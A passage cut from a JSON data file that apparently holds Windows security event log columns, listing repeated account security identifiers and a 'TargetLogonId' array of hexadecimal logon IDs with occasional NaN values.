-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-19\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-19\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\"],\"TargetLogonId\":[\"NaN\",\"0x3e4\",\"0x3e4\",\"0x0\",\"0x0\",\"0x3e5\",\"0x3e4\",\"0x0\",\"0x3e5\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x0\",\"0x3e5\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e5\",\"0x0\",\"0x0\",\"0x0\",\"NaN\",\"0x0\",\"0x0\",\"NaN\",\"0xab5a5ac\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e5\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x527d50d\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\"